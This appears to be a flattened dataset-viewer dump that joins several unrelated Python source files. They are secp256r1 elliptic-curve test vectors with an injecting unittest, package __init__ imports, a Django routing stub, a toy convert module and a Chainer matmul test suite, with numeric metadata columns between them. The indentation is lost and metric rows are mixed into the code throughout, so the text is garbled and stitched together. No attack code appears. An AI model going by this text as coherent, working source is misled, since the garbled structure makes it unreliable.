x = 47776904C0F1CC3A9C0984B66F75301A5FA68678F0D64AF8BA1ABCE34738A73E
y = AA005EE6B5B957286231856577648E8381B2804428D5733F32F787FF71F1FCDC
k = 18
x = 1057E0AB5780F470DEFC9378D1C7C87437BB4C6F9EA55C63D936266DBD781FDA
y = F6F1645A15CBE5DC9FA9B7DFD96EE5A7DCC11B5C5EF4F1F78D83B3393C6A45A2
k = 19
x = CB6D2861102C0C25CE39B7C17108C507782C452257884895C1FC7B74AB03ED83
y = 58D7614B24D9EF515C35E7100D6D6CE4A496716E30FA3E03E39150752BCECDAA
k = 20
x = 83A01A9378395BAB9BCD6A0AD03CC56D56E6B19250465A94A234DC4C6B28DA9A
y = 76E49B6DE2F73234AE6A5EB9D612B75C9F2202BB6923F54FF8240AAA86F640B8
k = 112233445566778899
x = 339150844EC15234807FE862A86BE77977DBFB3AE3D96F4C22795513AEAAB82F
y = B1C14DDFDC8EC1B2583F51E85A5EB3A155840F2034730E9B5ADA38B674336A21
k = 112233445566778899112233445566778899
x = 1B7E046A076CC25E6D7FA5003F6729F665CC3241B5ADAB12B498CD32F2803264
y = BFEA79BE2B666B073DB69A2A241ADAB0738FE9D2DD28B5604EB8C8CF097C457B
k = 29852220098221261079183923314599206100666902414330245206392788703677545185283
x = 9EACE8F4B071E677C5350B02F2BB2B384AAE89D58AA72CA97A170572E0FB222F
y = 1BBDAEC2430B09B93F7CB08678636CE12EAAFD58390699B5FD2F6E1188FC2A78
k = 57896042899961394862005778464643882389978449576758748073725983489954366354431
x = 878F22CC6DB6048D2B767268F22FFAD8E56AB8E2DC615F7BD89F1E350500DD8D
y = 714A5D7BB901C9C5853400D12341A892EF45D87FC553786756C4F0C9391D763E
k = 1766845392945710151501889105729049882997660004824848915955419660366636031
x = 659A379625AB122F2512B8DADA02C6348D53B54452DFF67AC7ACE4E8856295CA
y = 49D81AB97B648464D0B4A288BD7818FAB41A16426E943527C4FED8736C53D0F6
k = 28948025760307534517734791687894775804466072615242963443097661355606862201087
x = CBCEAAA8A4DD44BBCE58E8DB7740A5510EC2CB7EA8DA8D8F036B3FB04CDA4DE4
y = 4BD7AA301A80D7F59FD983FEDBE59BB7B2863FE46494935E3745B360E32332FA
k = 113078210460870548944811695960290644973229224625838436424477095834645696384
x = F0C4A0576154FF3A33A3460D42EAED806E854DFA37125221D37935124BA462A4
y = 5B392FA964434D29EEC6C9DBC261CF116796864AA2FAADB984A2DF38D1AEF7A3
k = 12078056106883488161242983286051341125085761470677906721917479268909056
x = 5E6C8524B6369530B12C62D31EC53E0288173BD662BDF680B53A41ECBCAD00CC
y = 447FE742C2BFEF4D0DB14B5B83A2682309B5618E0064A94804E9282179FE089F
k = 57782969857385448082319957860328652998540760998293976083718804450708503920639
x = 03792E541BC209076A3D7920A915021ECD396A6EB5C3960024BE5575F3223484
y = FC774AE092403101563B712F68170312304F20C80B40C06282063DB25F268DE4
k = 57896017119460046759583662757090100341435943767777707906455551163257755533312
x = 2379FF85AB693CDF901D6CE6F2473F39C04A2FE3DCD842CE7AAB0E002095BCF8
y = F8B476530A634589D5129E46F322B02FBC610A703D80875EE70D7CE1877436A1
k = 452312848374287284681282171017647412726433684238464212999305864837160993279
x = C1E4072C529BF2F44DA769EFC934472848003B3AF2C0F5AA8F8DDBD53E12ED7C
y = 39A6EE77812BB37E8079CD01ED649D3830FCA46F718C1D3993E4A591824ABCDB
k = 904571339174065134293634407946054000774746055866917729876676367558469746684
x = 34DFBC09404C21E250A9B40FA8772897AC63A094877DB65862B61BD1507B34F3
y = CF6F8A876C6F99CEAEC87148F18C7E1E0DA6E165FFC8ED82ABB65955215F77D3
k = 115792089210356248762697446949407573529996955224135760342422259061068512044349
x = 83A01A9378395BAB9BCD6A0AD03CC56D56E6B19250465A94A234DC4C6B28DA9A
y = 891B64911D08CDCC5195A14629ED48A360DDFD4596DC0AB007DBF5557909BF47
k = 115792089210356248762697446949407573529996955224135760342422259061068512044350
x = CB6D2861102C0C25CE39B7C17108C507782C452257884895C1FC7B74AB03ED83
y = A7289EB3DB2610AFA3CA18EFF292931B5B698E92CF05C1FC1C6EAF8AD4313255
k = 115792089210356248762697446949407573529996955224135760342422259061068512044351
x = 1057E0AB5780F470DEFC9378D1C7C87437BB4C6F9EA55C63D936266DBD781FDA
y = 090E9BA4EA341A246056482026911A58233EE4A4A10B0E08727C4CC6C395BA5D
k = 115792089210356248762697446949407573529996955224135760342422259061068512044352
x = 47776904C0F1CC3A9C0984B66F75301A5FA68678F0D64AF8BA1ABCE34738A73E
y = 55FFA1184A46A8D89DCE7A9A889B717C7E4D7FBCD72A8CC0CD0878008E0E0323
k = 115792089210356248762697446949407573529996955224135760342422259061068512044353
x = 76A94D138A6B41858B821C629836315FCD28392EFF6CA038A5EB4787E1277C6E
y = 567A019DCBE0D9F2934F5E4A1EE178DF7A665FFCF0387455F162228DB473AEEF
k = 115792089210356248762697446949407573529996955224135760342422259061068512044354
x = F0454DC6971ABAE7ADFB378999888265AE03AF92DE3A0EF163668C63E59B9D5F
y = 4A46C11BA6D1D2E1B19A6B1AE069BC19D5C4DE328A4A05C0B81A6321F2FCB0C9
k = 115792089210356248762697446949407573529996955224135760342422259061068512044355
x = 54E77A001C3862B97A76647F4336DF3CF126ACBE7A069C5E5709277324D2920B
y = 0A660E43D60BCE8BBDEDE073FA5D183C8E8E15898CAF6FF7E45837D09F2F4C8A
k = 115792089210356248762697446949407573529996955224135760342422259061068512044356
x = 177C837AE0AC495A61805DF2D85EE2FC792E284B65EAD58A98E15D9D46072C01
y = 9C44A731B1415AA85DBF6E524BF0B18DD911EB3D5E04B20C63BC441D10384027
k = 115792089210356248762697446949407573529996955224135760342422259061068512044357
x = 741DD5BDA817D95E4626537320E5D55179983028B2F82C99D500C5EE8624E3C4
y = F88F4B9463C7A024A98C7CAAB7784EAB71146ED4CA45A358E66A00DD32BB7E2C
k = 115792089210356248762697446949407573529996955224135760342422259061068512044358
x = 3ED113B7883B4C590638379DB0C21CDA16742ED0255048BF433391D374BC21D1
y = 6F66DF64333B375EDB37BC505B0B3975F6F2FB26A16776251D07110317D5C8BF
k = 115792089210356248762697446949407573529996955224135760342422259061068512044359
x = CEF66D6B2A3A993E591214D1EA223FB545CA6C471C48306E4C36069404C5723F
y = 78799D5CD655517091EDC32262C4B3EFA6F212D7018AE11135CB4455BB50F88C
k = 115792089210356248762697446949407573529996955224135760342422259061068512044360
x = EA68D7B6FEDF0B71878938D51D71F8729E0ACB8C2C6DF8B3D79E8A4B90949EE0
y = D5D8BB358D36031978FEB569B5715F37B28EB0165B217DC017A5DDB5B22FB705
k = 115792089210356248762697446949407573529996955224135760342422259061068512044361
x = 62D9779DBEE9B0534042742D3AB54CADC1D238980FCE97DBB4DD9DC1DB6FB393
y = 52A533416E1627DCB00EA288EE98311F5D12AE0A4418958725ABF595F0F66A81
k = 115792089210356248762697446949407573529996955224135760342422259061068512044362
x = 8E533B6FA0BF7B4625BB30667C01FB607EF9F8B8A80FEF5B300628703187B2A3
y = 8C14E2411FCCE7CA92F9607C590A6FFFAC38C9CD34FBE4DE3AA1E5793E0BFF4B
k = 115792089210356248762697446949407573529996955224135760342422259061068512044363
x = B01A172A76A4602C92D3242CB897DDE3024C740DEBB215B4C6B0AAE93C2291A9
y = 17A3EF8ACDC8252B9013F1D20458FC86E3FF0890E381E9420283B7AC7038801D
k = 115792089210356248762697446949407573529996955224135760342422259061068512044364
x = 51590B7A515140D2D784C85608668FDFEF8C82FD1F5BE52421554A0DC3D033ED
y = 1F3E82566FB58D83751E40C9407586D9F2FED1002B27F7772E2F44BB025E925B
k = 115792089210356248762697446949407573529996955224135760342422259061068512044365
x = E2534A3532D08FBBA02DDE659EE62BD0031FE2DB785596EF509302446B030852
y = 1F0EA8A4B39CC339E62011A02579D289B103693D0CF11FFAA3BD3DC0E7B12739
k = 115792089210356248762697446949407573529996955224135760342422259061068512044366
x = 5ECBE4D1A6330A44C8F7EF951D4BF165E6C6B721EFADA985FB41661BC6E7FD6C
y = 78CB9BF2B6670082C8B4F931E59B5D1327D54FCAC7B047C265864ED85D82AFCD
k = 115792089210356248762697446949407573529996955224135760342422259061068512044367
x = 7CF27B188D034F7E8A52380304B51AC3C08969E277F21B35A60B48FC47669978
y = F888AAEE24712FC0D6C26539608BCF244582521AC3167DD661FB4862DD878C2E
k = 115792089210356248762697446949407573529996955224135760342422259061068512044368
x = 6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296
y = B01CBD1C01E58065711814B583F061E9D431CCA994CEA1313449BF97C840AE0A
"""
class Secp256r1Test(unittest.TestCase):
def test_multiply(self):
for f1 in [15, 10000, 73**38]:
for f2 in [2, 3, 78192, 71**39]:
k1 = f1 * secp256r1_generator
k2 = (f1 * f2) * secp256r1_generator
self.assertEqual(f2 * k1, k2)
def inject():
for triplets in VECTORS.strip().split("\n\n"):
k_line, x_line, y_line = triplets.split("\n")
if k_line.startswith("k = ") and x_line.startswith("x = ") and y_line.startswith("y = "):
k = int(k_line[4:])
x = int(x_line[4:], 16)
y = int(y_line[4:], 16)
name_of_f = "test_vector_%d" % k
def make_test(k, x, y):
def the_test(self):
self.assertEqual(k * secp256r1_generator, (x, y))
return the_test
setattr(Secp256r1Test, name_of_f, make_test(k, x, y))
else:
print("WARNING: bad vector %s" % repr(triplets))
inject()
| 44.40081 | 97 | 0.893407 | 456 | 10,967 | 21.434211 | 0.421053 | 0.007366 | 0.013505 | 0.002046 | 0.002251 | 0 | 0 | 0 | 0 | 0 | 0 | 0.661287 | 0.079055 | 10,967 | 246 | 98 | 44.581301 | 0.306436 | 0 | 0 | 0.218579 | 0 | 0 | 0.906447 | 0.821191 | 0 | 1 | 0 | 0 | 0.010929 | 1 | 0.021858 | false | 0 | 0.010929 | 0 | 0.043716 | 0.005464 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e0291584c54208aa7bab450e1d9267a858a13af7 | 106 | py | Python | pyfgaws/logs/__init__.py | fulcrumgenomics/pyfgaws | 1f040666c869ce56b3df3ee8053d747dae4d54ef | [
"MIT"
] | 6 | 2020-06-04T20:35:31.000Z | 2021-12-28T18:51:31.000Z | pyfgaws/logs/__init__.py | fulcrumgenomics/pyfgaws | 1f040666c869ce56b3df3ee8053d747dae4d54ef | [
"MIT"
] | 13 | 2020-06-04T20:35:59.000Z | 2020-07-16T19:08:06.000Z | pyfgaws/logs/__init__.py | fulcrumgenomics/pyfgaws | 1f040666c869ce56b3df3ee8053d747dae4d54ef | [
"MIT"
] | null | null | null | from pyfgaws.logs.api import DEFAULT_POLLING_INTERVAL, Log
__all__ = ("DEFAULT_POLLING_INTERVAL", "Log")
| 26.5 | 58 | 0.801887 | 14 | 106 | 5.5 | 0.714286 | 0.363636 | 0.571429 | 0.649351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09434 | 106 | 3 | 59 | 35.333333 | 0.802083 | 0 | 0 | 0 | 0 | 0 | 0.254717 | 0.226415 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e039bb807cb0cd229dbd509b498d20cc22b178cb | 259 | py | Python | bread/views/__init__.py | basxsoftwareassociation/bread | 062ec82a565f81eff51ea91dc0f211139bc7fe96 | [
"Apache-2.0",
"BSD-3-Clause"
] | 13 | 2021-01-19T08:28:08.000Z | 2022-01-28T03:44:34.000Z | bread/views/__init__.py | basxsoftwareassociation/bread | 062ec82a565f81eff51ea91dc0f211139bc7fe96 | [
"Apache-2.0",
"BSD-3-Clause"
] | 80 | 2020-12-07T04:37:39.000Z | 2022-03-08T14:42:13.000Z | bread/views/__init__.py | basxsoftwareassociation/bread | 062ec82a565f81eff51ea91dc0f211139bc7fe96 | [
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2020-12-03T15:06:53.000Z | 2021-03-16T03:47:29.000Z | from .add import * # noqa
from .auth import * # noqa
from .browse import * # noqa
from .delete import * # noqa
from .edit import * # noqa
from .read import * # noqa
from .system import * # noqa
from .util import * # noqa
from .wizard import * # noqa
| 25.9 | 29 | 0.65251 | 36 | 259 | 4.694444 | 0.333333 | 0.532544 | 0.662722 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.243243 | 259 | 9 | 30 | 28.777778 | 0.862245 | 0.169884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e04e6e33a1eda055c543cd37baacf1b34db5d035 | 49 | py | Python | Proj/routing.py | narae0409/playpay | 8ca27083639c5c6567216155417351a6eb1f100d | [
"MIT"
] | 2 | 2021-01-18T14:31:26.000Z | 2021-01-18T15:52:54.000Z | Proj/routing.py | narae0409/playpay | 8ca27083639c5c6567216155417351a6eb1f100d | [
"MIT"
] | null | null | null | Proj/routing.py | narae0409/playpay | 8ca27083639c5c6567216155417351a6eb1f100d | [
"MIT"
] | null | null | null | # chat/routing.py
from django.urls import re_path | 24.5 | 31 | 0.816327 | 9 | 49 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102041 | 49 | 2 | 31 | 24.5 | 0.886364 | 0.306122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e05fe1e5311c3fa258f5a7c1f5c35b4f31e99877 | 47 | py | Python | augtistic/utils/__init__.py | milesgray/augtistic | 66baf2e1daf1c456d112bbe7a8c7515c9fe3804d | [
"MIT"
] | 1 | 2021-02-15T10:09:54.000Z | 2021-02-15T10:09:54.000Z | augtistic/utils/__init__.py | milesgray/augtistic | 66baf2e1daf1c456d112bbe7a8c7515c9fe3804d | [
"MIT"
] | null | null | null | augtistic/utils/__init__.py | milesgray/augtistic | 66baf2e1daf1c456d112bbe7a8c7515c9fe3804d | [
"MIT"
] | 2 | 2021-03-18T23:42:47.000Z | 2021-03-19T00:10:51.000Z | from .ensure_tf_install import check_tf_version | 47 | 47 | 0.914894 | 8 | 47 | 4.875 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.06383 | 47 | 1 | 47 | 47 | 0.886364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e078422e91822e28f49353ae595859f9667bdaa0 | 148 | py | Python | learn_from_import/tools/file.py | YellowTulipShow/PythonScripts | 09bf756f08e6b66fe3b13206c3b972c3434e53ee | [
"Apache-2.0"
] | 1 | 2020-01-16T01:40:58.000Z | 2020-01-16T01:40:58.000Z | learn_from_import/tools/file.py | YellowTulipShow/PythonScripts | 09bf756f08e6b66fe3b13206c3b972c3434e53ee | [
"Apache-2.0"
] | null | null | null | learn_from_import/tools/file.py | YellowTulipShow/PythonScripts | 09bf756f08e6b66fe3b13206c3b972c3434e53ee | [
"Apache-2.0"
] | null | null | null | # coding: UTF-8
import convert
def read():
convert.trim()
print('file.read()')
def write():
convert.trim()
print('file.write()')
| 12.333333 | 25 | 0.587838 | 19 | 148 | 4.578947 | 0.578947 | 0.252874 | 0.367816 | 0.45977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008621 | 0.216216 | 148 | 11 | 26 | 13.454545 | 0.741379 | 0.087838 | 0 | 0.285714 | 0 | 0 | 0.172932 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | true | 0 | 0.142857 | 0 | 0.428571 | 0.285714 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0eba91294dbb48f63c6a0dbef746be50cab95712 | 294 | py | Python | app/mod_cmd/commands/projects/create_project.py | jaycode/Arthur.workspace | 7a581104141ee5f556e058b1276b4087a2921dfc | [
"Apache-2.0"
] | null | null | null | app/mod_cmd/commands/projects/create_project.py | jaycode/Arthur.workspace | 7a581104141ee5f556e058b1276b4087a2921dfc | [
"Apache-2.0"
] | null | null | null | app/mod_cmd/commands/projects/create_project.py | jaycode/Arthur.workspace | 7a581104141ee5f556e058b1276b4087a2921dfc | [
"Apache-2.0"
] | null | null | null | """Create a new project
"""
def run(project = None, args = [], **kwargs):
"""Create a new project.
create_project [name]
Args:
name: Name of project to be created.
"""
create_project(name)
return [project, instruction]
def create_project(name):
pass | 17.294118 | 45 | 0.605442 | 36 | 294 | 4.861111 | 0.472222 | 0.222857 | 0.291429 | 0.194286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.268707 | 294 | 17 | 46 | 17.294118 | 0.813953 | 0.384354 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.2 | 0 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
0ec8e46d89af1f3467b7f2b2ffaf43acebbabb87 | 8,322 | py | Python | tests/chainer_tests/functions_tests/math_tests/test_matmul.py | ytoyama/yans_chainer_hackathon | 744e7a5a67da8dec2869879f0adfae2d43eaf75c | [
"MIT"
] | null | null | null | tests/chainer_tests/functions_tests/math_tests/test_matmul.py | ytoyama/yans_chainer_hackathon | 744e7a5a67da8dec2869879f0adfae2d43eaf75c | [
"MIT"
] | 1 | 2016-11-09T06:32:32.000Z | 2016-11-09T10:20:04.000Z | tests/chainer_tests/functions_tests/math_tests/test_matmul.py | ytoyama/yans_chainer_hackathon | 744e7a5a67da8dec2869879f0adfae2d43eaf75c | [
"MIT"
] | 1 | 2018-11-18T00:36:51.000Z | 2018-11-18T00:36:51.000Z | import unittest
import numpy
import six
import chainer
from chainer import cuda
import chainer.functions as F
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
from chainer.testing import condition
class _TestMatMul(unittest.TestCase):
def check_forward(self, x1_data, x2_data):
x1 = chainer.Variable(x1_data)
x2 = chainer.Variable(x2_data)
y = self.op(x1, x2)
gradient_check.assert_allclose(self.forward_answer, y.data)
@condition.retry(3)
def test_matmul_forward_cpu(self):
self.check_forward(self.x1, self.x2)
@attr.gpu
@condition.retry(3)
def test_matmul_forward_gpu(self):
self.check_forward(cuda.to_gpu(self.x1), cuda.to_gpu(self.x2))
def check_backward(self, x1_data, x2_data, y_grad, atol):
x1 = chainer.Variable(x1_data)
x2 = chainer.Variable(x2_data)
y = self.op(x1, x2)
y.grad = y_grad
y.backward()
func = y.creator
f = lambda: func.forward((x1.data, x2.data))
gx1, gx2 = gradient_check.numerical_grad(
f, (x1.data, x2.data), (y.grad,))
gradient_check.assert_allclose(gx1, x1.grad, atol=atol)
gradient_check.assert_allclose(gx2, x2.grad, atol=atol)
@condition.retry(3)
def test_matmul_backward_cpu(self):
self.check_backward(self.x1, self.x2, self.gy, atol=1e-2)
@attr.gpu
@condition.retry(3)
def test_matmul_backward_gpu(self):
self.check_backward(
cuda.to_gpu(self.x1), cuda.to_gpu(self.x2),
cuda.to_gpu(self.gy), atol=1e-2)
m = 2
k = 5
n = 10
class TestMatMulMatrixMatrix(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(.5, 1, (m, k)).astype(numpy.float32)
self.x2 = numpy.random.uniform(.5, 1, (k, n)).astype(numpy.float32)
self.gy = numpy.random.uniform(-1, 1, (m, n)).astype(numpy.float32)
self.op = lambda x, y: F.matmul(x, y)
self.forward_answer = numpy.dot(self.x1, self.x2)
class TestMatMulMatrixTMatrix(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(.5, 1, (k, m)).astype(numpy.float32)
self.x2 = numpy.random.uniform(.5, 1, (k, n)).astype(numpy.float32)
self.gy = numpy.random.uniform(-1, 1, (m, n)).astype(numpy.float32)
self.op = lambda x, y: F.matmul(x, y, transa=True)
self.forward_answer = numpy.dot(self.x1.T, self.x2)
class TestMatMulMatrixMatrixT(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(.5, 1, (m, k)).astype(numpy.float32)
self.x2 = numpy.random.uniform(.5, 1, (n, k)).astype(numpy.float32)
self.gy = numpy.random.uniform(-1, 1, (m, n)).astype(numpy.float32)
self.op = lambda x, y: F.matmul(x, y, transb=True)
self.forward_answer = numpy.dot(self.x1, self.x2.T)
class TestMatMulMatrixTMatrixT(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(.5, 1, (k, m)).astype(numpy.float32)
self.x2 = numpy.random.uniform(.5, 1, (n, k)).astype(numpy.float32)
self.gy = numpy.random.uniform(-1, 1, (m, n)).astype(numpy.float32)
self.op = lambda x, y: F.matmul(x, y, transa=True, transb=True)
self.forward_answer = numpy.dot(self.x1.T, self.x2.T)
class TestMatMulVectorTVector(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(.5, 1, (m,)).astype(numpy.float32)
self.x2 = numpy.random.uniform(.5, 1, (m,)).astype(numpy.float32)
self.gy = numpy.random.uniform(-1, 1, (1, 1)).astype(numpy.float32)
self.op = lambda x, y: F.matmul(x, y, transa=True)
self.forward_answer = numpy.dot(self.x1, self.x2).reshape(1, 1)
class TestMatMulVectorVectorT(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(.5, 1, (m,)).astype(numpy.float32)
self.x2 = numpy.random.uniform(.5, 1, (m,)).astype(numpy.float32)
self.gy = numpy.random.uniform(-1, 1, (m, m)).astype(numpy.float32)
self.op = lambda x, y: F.matmul(x, y, transb=True)
self.forward_answer = numpy.dot(
self.x1.reshape(m, 1), self.x2.reshape(1, m))
batch_size = 10
class TestBatchMatMulMatrixMatrix(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(
.5, 1, (batch_size, m, k)).astype(numpy.float32)
self.x2 = numpy.random.uniform(
.5, 1, (batch_size, k, n)).astype(numpy.float32)
self.gy = numpy.random.uniform(
-1, 1, (batch_size, m, n)).astype(numpy.float32)
self.op = lambda x, y: F.batch_matmul(x, y)
self.forward_answer = numpy.array([
numpy.dot(self.x1[i], self.x2[i])
for i in six.moves.range(batch_size)])
class TestBatchMatMulMatrixTMatrix(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(
.5, 1, (batch_size, k, m)).astype(numpy.float32)
self.x2 = numpy.random.uniform(
.5, 1, (batch_size, k, n)).astype(numpy.float32)
self.gy = numpy.random.uniform(
-1, 1, (batch_size, m, n)).astype(numpy.float32)
self.op = lambda x, y: F.batch_matmul(x, y, transa=True)
self.forward_answer = numpy.array([
numpy.dot(self.x1[i].T, self.x2[i])
for i in six.moves.range(batch_size)])
class TestBatchMatMulMatrixMatrixT(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(
.5, 1, (batch_size, m, k)).astype(numpy.float32)
self.x2 = numpy.random.uniform(
.5, 1, (batch_size, n, k)).astype(numpy.float32)
self.gy = numpy.random.uniform(
-1, 1, (batch_size, m, n)).astype(numpy.float32)
self.op = lambda x, y: F.batch_matmul(x, y, transb=True)
self.forward_answer = numpy.array([
numpy.dot(self.x1[i], self.x2[i].T)
for i in six.moves.range(batch_size)])
class TestBatchMatMulMatrixTMatrixT(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(
.5, 1, (batch_size, k, m)).astype(numpy.float32)
self.x2 = numpy.random.uniform(
.5, 1, (batch_size, n, k)).astype(numpy.float32)
self.gy = numpy.random.uniform(
-1, 1, (batch_size, m, n)).astype(numpy.float32)
self.op = lambda x, y: F.batch_matmul(x, y, transa=True, transb=True)
self.forward_answer = numpy.array([
numpy.dot(self.x1[i].T, self.x2[i].T)
for i in six.moves.range(batch_size)])
class TestBatchMatMulVectorTVector(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(
.5, 1, (batch_size, m,)).astype(numpy.float32)
self.x2 = numpy.random.uniform(
.5, 1, (batch_size, m,)).astype(numpy.float32)
self.gy = numpy.random.uniform(
-1, 1, (batch_size, 1, 1)).astype(numpy.float32)
self.op = lambda x, y: F.batch_matmul(x, y, transa=True)
self.forward_answer = numpy.array([
numpy.dot(self.x1[i], self.x2[i])
for i in six.moves.range(batch_size)]).reshape(batch_size, 1, 1)
class TestBatchMatMulVectorVectorT(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(
.5, 1, (batch_size, m,)).astype(numpy.float32)
self.x2 = numpy.random.uniform(
.5, 1, (batch_size, m,)).astype(numpy.float32)
self.gy = numpy.random.uniform(
-1, 1, (batch_size, m, m)).astype(numpy.float32)
self.op = lambda x, y: F.batch_matmul(x, y, transb=True)
self.forward_answer = numpy.array([
numpy.dot(self.x1[i].reshape(m, 1), self.x2[i].reshape(1, m))
for i in six.moves.range(batch_size)])
class TestBatchMatMulMatrixMatrixBatchSize1(_TestMatMul):
def setUp(self):
self.x1 = numpy.random.uniform(
.5, 1, (1, m, k)).astype(numpy.float32)
self.x2 = numpy.random.uniform(
.5, 1, (1, k, n)).astype(numpy.float32)
self.gy = numpy.random.uniform(
-1, 1, (1, m, n)).astype(numpy.float32)
self.op = lambda x, y: F.batch_matmul(x, y)
self.forward_answer = numpy.array([
numpy.dot(self.x1[i], self.x2[i])
for i in six.moves.range(1)])
testing.run_module(__name__, __file__)
| 36.025974 | 77 | 0.615117 | 1,206 | 8,322 | 4.151741 | 0.076285 | 0.08568 | 0.140204 | 0.17136 | 0.779109 | 0.763931 | 0.75714 | 0.739964 | 0.725984 | 0.712003 | 0 | 0.042756 | 0.232757 | 8,322 | 230 | 78 | 36.182609 | 0.741425 | 0 | 0 | 0.585227 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017045 | 1 | 0.107955 | false | 0 | 0.056818 | 0 | 0.244318 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.